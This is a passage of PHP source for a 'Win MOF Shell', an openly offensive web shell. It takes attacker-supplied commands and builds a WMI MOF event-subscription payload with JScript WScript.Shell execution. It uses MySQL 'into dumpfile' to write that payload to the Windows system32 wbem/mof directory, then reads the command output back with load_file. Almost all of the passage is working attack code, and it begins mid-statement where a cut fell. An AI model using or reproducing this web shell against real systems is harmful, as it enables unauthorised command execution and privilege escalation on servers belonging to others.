location.href='?action=connect'";
}
if(empty($_GET["action"])){
?>
Win MOF Shell
'.mysql_error().'');
echo "";
echo "";
if (isset($_POST['cmd'])){
$strCmd=$_POST['cmd'];
$cmdshell='cmd /c '.$strCmd.'>'.$path;
$mofname="c:/windows/system32/wbem/mof/system.mof";
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")
instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};
instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};
instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($_COOKIE["connect"]["dbname"],$conn);
$sql1="select '$payload' into dumpfile '$mofname';";
if(mysql_query($sql1))
echo "
Execute Successful!
Please click the read button to check the result!!
If the result is not correct,try read again later
"; else die(mysql_error());
mysql_close($conn);
}
if(isset($_POST['flag']))
{
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die(''.mysql_error().'
');
$sql2="select load_file(\"".$path."\");";
$result2=mysql_query($sql2);
$num=mysql_num_rows($result2);
while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
echo "
";
echo ''. $row[0].'
';
}
mysql_close($conn);
}
}
?>